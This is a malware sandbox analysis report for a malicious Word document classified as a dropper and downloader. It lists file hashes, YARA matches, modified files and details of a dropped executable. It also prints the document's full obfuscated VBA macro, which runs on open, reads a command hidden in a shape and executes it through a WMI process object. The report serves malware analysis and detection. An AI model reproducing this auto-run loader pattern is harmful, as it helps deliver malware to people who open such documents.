8de655e6...32b8 | Files
Logo
Try VMRay Analyzer
VTI SCORE: 100/100
Dynamic Analysis Report
Classification: Dropper, Downloader

8de655e68ab3408b1101cd0e5f4c3dbe1a361cbb2a5ee10888f5ad30b95332b8 (SHA256)

cm_coupon_6185.doc

Word Document

Created at 2018-11-26 15:52:00

...

Notifications (1/1)

The operating system was rebooted during the analysis.

Filters:
Filename Category Type Severity Actions
C:\Users\aETAdzjz\Desktop\cm_coupon_6185.doc Sample File Word Document
Suspicious
...
»
Mime Type application/msword
File Size 78.38 KB
MD5 f17ac0e1221e96efb1689f32e4b855e1 Copy to Clipboard
SHA1 325eb53851b4fb65c75c97b0ae17df24db4d714b Copy to Clipboard
SHA256 8de655e68ab3408b1101cd0e5f4c3dbe1a361cbb2a5ee10888f5ad30b95332b8 Copy to Clipboard
SSDeep 768:pHTVucRFoqkp59YBvLdTv9ReVi4eFov5UHRFBr+1oTUHPQVGm93JOWextOy+KG:tTocn1kp59gxBK85fBr+aTmEGm9L7R Copy to Clipboard
Parser Error Remark Static analyzer was unable to completely parse the analyzed file
File Reputation Information
»
Severity
Suspicious
First Seen 2018-11-26 14:00 (UTC+1)
Last Seen 2018-11-26 14:00 (UTC+1)
Office Information
»
Revision 1
Create Time 2018-11-26 12:33:00+00:00
Modify Time 2018-11-26 12:33:00+00:00
Document Information
»
Codepage Latin-1
Application Microsoft Office Word
App Version 16.0
Template Normal.dotm
Document Security SecurityFlag.NONE
Page Count 1
Line Count 1
Paragraph Count 1
Word Count 2
Character Count 13
Chars With Spaces 14
Heading Pairs Title
scale_crop False
shared_doc False
VBA Macros (1)
»
Macro #1: NLMPGANATmYQ
» 
Attribute VB_Name = "NLMPGANATmYQ"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
   On Error Resume Next
      Select Case iKTOciszh
         Case 45985471
            FPbpt = 21874628
            QBCjFSm = CLng(203469733)
         Case 184538627
            HdjuUVbj = Oct(qRbdFXPR)
            NHUJa = LIqzFBc
         Case 325598872
            HsDaI = CDate(tzIFNLoX)
            LpAfRUQzD = Int(71584852 * LfbbmNUY)
      End Select
   On Error Resume Next
      Select Case EKXzcmTM
         Case 83761720
            aiPSolG = 151004253
            aomzGXbS = CLng(249060251)
         Case 270952365
            urpBmBW = Oct(WSPYGW)
            FwWbZimvu = RKRaATiXj
         Case 237000209
            sOfmPtAV = CDate(QjdPRd)
            KPuIvuGUr = Int(33667943 * VwhAWmHM)
      End Select
   On Error Resume Next
      Select Case nMmQopiS
         Case 127838003
            jzFjfkN = 118011559
            jLwNJ = CLng(259691284)
         Case 225166846
            mAJONzd = Oct(UjjDZWQY)
            HMrcZJc = EqYrwccF
         Case 127063817
            SJKVzczKE = CDate(OhNvYlB)
            quNrhfJ = Int(45191263 * sVDGz)
      End Select
Set zOSlMPc = Shapes("ukCIsbaRsAAdFc")
   On Error Resume Next
      Select Case zHOZJ
         Case 191259502
            tpFipF = 14731536
            dVCSiXTk = CLng(168009887)
         Case 107955366
            RUkfLLl = Oct(liwhqAi)
            JUYzXuS = TNutdjXp
         Case 62684513
            LzIJuTEa = CDate(DfoMSz)
            JPAREWBEM = Int(332074737 * rBEKJX)
      End Select
   On Error Resume Next
      Select Case hhwXm
         Case 257919450
            TrUZEbE = 316507397
            fJtLmoGjo = CLng(303689462)
         Case 134936929
            PwhjYSi = Oct(kaXjqvjzZ)
            HGqjvPPQ = tbSisS
         Case 334864719
            vnsfI = CDate(CIEmNVq)
            JHFnO = Int(238468544 * ASRHzpRS)
      End Select
VwzGAmpk = "" + OzaFuwd + iActd + osdoz + zOSlMPc.TextFrame.TextRange.Text + vCMZMsWQ + UkJpvWH
   On Error Resume Next
      Select Case nZHKsnk
         Case 187485526
            YSzqZi = 125863223
            cJKFVKmj = CLng(278640972)
         Case 135345463
            kjdiaWk = Oct(GIzilS)
            bwwWoYMFY = MXRPUdC
         Case 126551216
            rjuoZU = CDate(KMccbZma)
            piTjwYaF = Int(20790940 * wSDmiz)
      End Select
   On Error Resume Next
      Select Case NbWHjPb
         Case 17938493
            CrWMj = 196554140
            ZfRmj = CLng(167685107)
         Case 178717545
            zlQGjvLh = Oct(mHtkSOPk)
            ENKLz = CdzSrRqo
         Case 5385905
            KzwVTLrKo = CDate(YkUHQBB)
            VNVlnfDG = Int(330714115 * pQwTstIRR)
      End Select
Set bfIKKuI = GetObject(sWzWXMSI + "new:72C24DD5-D70A-438B-8A42-98424B88AFB8" + BpPHSnVYJ)
   On Error Resume Next
      Select Case FpwAJtB
         Case 214035387
            FHUXoE = 246239110
            Ornoj = CLng(327686778)
         Case 122608792
            QWKJPPnvX = Oct(KJXaNwRF)
            QLbFDqf = KSoZsdK
         Case 291525183
            qWzpTZz = CDate(tciod)
            XbYCipQGT = Int(240147753 * ddjJSfNi)
      End Select
   On Error Resume Next
      Select Case TLzDi
         Case 209993582
            VqpjFpME = 235615500
            jjupnc = CLng(206130063)
         Case 146521999
            oqnwfFuu = Oct(kbtjZCQmj)
            zDBLM = AOBMfiTh
         Case 314698920
            thsKaLvPU = CDate(XAJrY)
            wXWim = Int(202915500 * JiqshQB)
      End Select
Const aqKdDc = 0
   On Error Resume Next
      Select Case BZitbM
         Case 282266177
            WumYDFnic = 338577405
            MGcnDbm = CLng(272081948)
         Case 7126579
            jVNDpJmwo = Oct(titLiO)
            RnqGFt = CEYmaS
         Case 271032713
            pwmZZUO = CDate(AinlfdNRI)
            MUBKsdbA = Int(8653768 * kAVWYWtv)
      End Select
   On Error Resume Next
      Select Case bIdqNBO
         Case 11396923
            TfbutJi = 312875351
            GzvjvXX = CLng(179179205)
         Case 9027108
            VmHcdzzM = Oct(nYHIaD)
            VIfkY = dHuwdvN
         Case 40738771
            mAifpM = CDate(zwtzP)
            zwpUc = Int(279791305 * PwRLA)
      End Select
   On Error Resume Next
      Select Case dtcXjQ
         Case 26157511
            NpPHQ = 175622204
            jpLAvYn = CLng(168439811)
         Case 101576679
            loEKKlz = Oct(FqkiccB)
            HXcdw = rqdiJKYv
         Case 274879967
            Nzwbzq = CDate(ERdLk)
            wMiznRQzm = Int(187361467 * zNhjc)
      End Select
bfIKKuI.Run@ VwzGAmpk, aqKdDc
   On Error Resume Next
      Select Case akulsl
         Case 146773979
            lbHSvY = 66888400
            hjwrFB = CLng(187037285)
         Case 15044243
            uFwiFZWz = Oct(IilvTiw)
            DWwURS = KfQjN
         Case 53135399
            IsBzfZc = CDate(CkUTPcim)
            PvozGG = Int(105200013 * muYZInk)
      End Select
   On Error Resume Next
      Select Case ZRRkhKk
         Case 162864993
            BilCVIi = 253217804
            mnVpT = CLng(9177140)
         Case 286817386
            lcFoLCXv = Oct(oAMUGWZ)
            XTAczv = wzXUzkzP
         Case 292735914
            YHThqjNGr = CDate(iafjQw)
            whrJohZ = Int(280145282 * fCvtqk)
      End Select
   On Error Resume Next
      Select Case RAHWHHA
         Case 65253938
            jQZOPzWXv = 339259433
            GtTAQq = CLng(141708577)
         Case 284187735
            LMZpb = Oct(wZfdlr)
            hQKNj = iMwwh
         Case 299501595
            XhGGQm = CDate(zfWqj)
            wBzrRNTD = Int(78477970 * pDKUM)
      End Select
End Sub
YARA Matches
»
Rule Name Rule Description Classification Severity Actions
Document_Contains_Execution_Commands Execution commands inside a document; possible dropper -
3/5
...
Document_Contains_Execution_Commands Execution commands inside a document; possible dropper -
3/5
...
c:\users\aetadzjz\appdata\local\microsoft\windows\temporary internet files\content.ie5\index.dat Modified File Stream
Unknown
...
»
Mime Type application/octet-stream
File Size 48.00 KB
MD5 0d7742564c1bf905226155ddc8801d2b Copy to Clipboard
SHA1 72fd26e88b22a795f79e85703fb4a6ce40a994e0 Copy to Clipboard
SHA256 91425e000a3385e9c11c19ed0756d6add1f6e049de221c21c9b49873ecb278da Copy to Clipboard
SSDeep 48:qHv5Jyik0i5HXWyAl7UGAnwniGhAnwwoSHXl16YSYP5lPrCoNqK5B5NA+KNi3bR/:qH7EH3WyBcaUMz3P5s+XA8dRTwLDP Copy to Clipboard
c:\users\aetadzjz\appdata\roaming\microsoft\windows\cookies\index.dat Modified File Stream
Unknown
...
»
Mime Type application/octet-stream
File Size 32.00 KB
MD5 b25ed5680eaebd743130ba81c6fa3e7f Copy to Clipboard
SHA1 bdd244a2878fce8ddd7b97a1ae4ed6dc6f38bd17 Copy to Clipboard
SHA256 cd34c6d5341fa3554bf696d02934877f38e196bdef1d30720a53f923892b7779 Copy to Clipboard
SSDeep 12:qjUXZ4OE32Y3XckQslQKy3gTLPrOLWlrOu933ekIQ3rIQbq93ILtrOLWlrOR:qjU6AXkQwQc3rOirOwekIyrIUZrOirO Copy to Clipboard
c:\users\aetadzjz\appdata\local\microsoft\windows\history\history.ie5\index.dat Modified File Stream
Unknown
...
»
Mime Type application/octet-stream
File Size 64.00 KB
MD5 aa73bb41169e256d8b7474a877e2769e Copy to Clipboard
SHA1 12fd08f88e61c39c3a4fdf33ded0f2e39ab574cc Copy to Clipboard
SHA256 8dab0f4e33fd26484b86817ec85078b8bfb9d2b0149463451ab0e0e4d2950b69 Copy to Clipboard
SSDeep 96:qvzEMiozzcwjQ2ubh9NdeigWEsw4BtygPkxF0v33kp2uDPpGueVV9KWEFBiDXtgO:YzV8TUsEsJ9yMgBfE Copy to Clipboard
C:\Users\aETAdzjz\AppData\Local\Temp\bGD.exe Created File Binary
Unknown
...
»
Also Known As c:\users\aetadzjz\appdata\local\microsoft\windows\cofiretlnt.exe (Created File)
Mime Type application/x-dosexec
File Size 132.00 KB
MD5 31342e4b67aaa69e9a8a6bd6604dc668 Copy to Clipboard
SHA1 d4159ed9b7f143d9c686a51b16960d33565bec4a Copy to Clipboard
SHA256 5f1032665271c1fdf50e36a10afca8f2413e297b73d5114a2ed3d0022008c649 Copy to Clipboard
SSDeep 3072:rX/2i7MRvfSlSu+oV1D2y+Gsi1iOH++jj3fVQhxbfNWb8uTmTZ98+qZMKQTvIhEX:yi7MRvfSlSu+oV1D2y+GskiOH++j4xb3 Copy to Clipboard
ImpHash d98de4a30bf76dd8592ade1c467f9292 Copy to Clipboard
PE Information
»
Image Base 0x400000
Entry Point 0x403700
Size Of Code 0x3000
File Type executable
Subsystem windows_gui
Machine Type i386
Compile Timestamp 1995-11-19 14:43:13+00:00
Version Information (5)
»
- -
InternalName -
CompanyName -
FileVersion -
FileDescription remtsv
Sections (6)
»
Name Virtual Address Virtual Size Raw Data Size Raw Data Offset Flags Entropy
.text 0x401000 0x2868 0x3000 0x1000 type_dsect, cnt_code, mem_execute, mem_read 5.9
.io 0x404000 0x734 0x1000 0x4000 cnt_initialized_data, mem_read 2.5
.data 0x405000 0x2d8c 0x1000 0x5000 cnt_initialized_data, mem_read, mem_write 3.59
.crt0 0x408000 0x1801c 0x19000 0x6000 cnt_initialized_data, mem_read, mem_write 7.89
.rsrc 0x421000 0x390 0x1000 0x1f000 cnt_initialized_data, mem_read 0.8
.reloc 0x422000 0x52c 0x1000 0x20000 cnt_initialized_data, mem_discardable, mem_read 2.73
Imports (4)
»
KERNEL32.dll (4)
»
API Name Ordinal IAT Address Thunk RVA Thunk Offset Hint
GetSystemTime 0x0 0x404010 0x45c0 0x45c0 0x277
GetThreadPriority 0x0 0x404014 0x45c4 0x45c4 0x28e
GetCommandLineW 0x0 0x404018 0x45c8 0x45c8 0x187
GetCurrentThread 0x0 0x40401c 0x45cc 0x45cc 0x1c4
ESENT.dll (1)
»
API Name Ordinal IAT Address Thunk RVA Thunk Offset Hint
JetGetBookmark 0x0 0x404000 0x45b0 0x45b0 0x8c
USER32.dll (9)
»
API Name Ordinal IAT Address Thunk RVA Thunk Offset Hint
GetScrollPos 0x0 0x404024 0x45d4 0x45d4 0x176
IsWindowEnabled 0x0 0x404028 0x45d8 0x45d8 0x1dc
IsClipboardFormatAvailable 0x0 0x40402c 0x45dc 0x45dc 0x1ca
CountClipboardFormats 0x0 0x404030 0x45e0 0x45e0 0x56
GetShellWindow 0x0 0x404034 0x45e4 0x45e4 0x179
GetScrollRange 0x0 0x404038 0x45e8 0x45e8 0x177
SetTimer 0x0 0x40403c 0x45ec 0x45ec 0x2bb
SetMenu 0x0 0x404040 0x45f0 0x45f0 0x29c
GetFocus 0x0 0x404044 0x45f4 0x45f4 0x12c
GDI32.dll (1)
»
API Name Ordinal IAT Address Thunk RVA Thunk Offset Hint
GetTextColor 0x0 0x404008 0x45b8 0x45b8 0x218
Exit-Icon
WHOIS Domain Information
Domain Name
WHOIS Response 

       		
      

     

    

   

  

  

  

  

   

    
    

     Function Logfile
    

    

     

      Download-Icon
     

    

    

     Exit-Icon
    

   

   

    

     

      
       This feature requires an online-connection to the VMRay backend.
      
      

      

      An offline version with limited functionality is also provided.
      

      The offline version is supported only in Mozilla Firefoxwith deactivated setting "security.fileuri.strict_origin_policy".
     

     

    

   

   

    Before
   

   

    

     

      
       This feature requires an online-connection to the VMRay backend.
      
      

      

      An offline version with limited functionality is also provided.
      

      The offline version is supported only in Mozilla Firefoxwith deactivated setting "security.fileuri.strict_origin_policy".
     

     

    

   

   

    After
   

   

    

     

      
       This feature requires an online-connection to the VMRay backend.
      
      

      

      An offline version with limited functionality is also provided.
      

      The offline version is supported only in Mozilla Firefoxwith deactivated setting "security.fileuri.strict_origin_policy".
     

     

    

   

   

    

     
      

       
       
       
       
      

     
     
     
    

   

  

  

   

    
    

     Screenshot
    

    

     Expand-Icon
    

    

     Exit-Icon
    

   

   

    

     icon_left
    

    

     icon_left
    

   

   

   

   

    image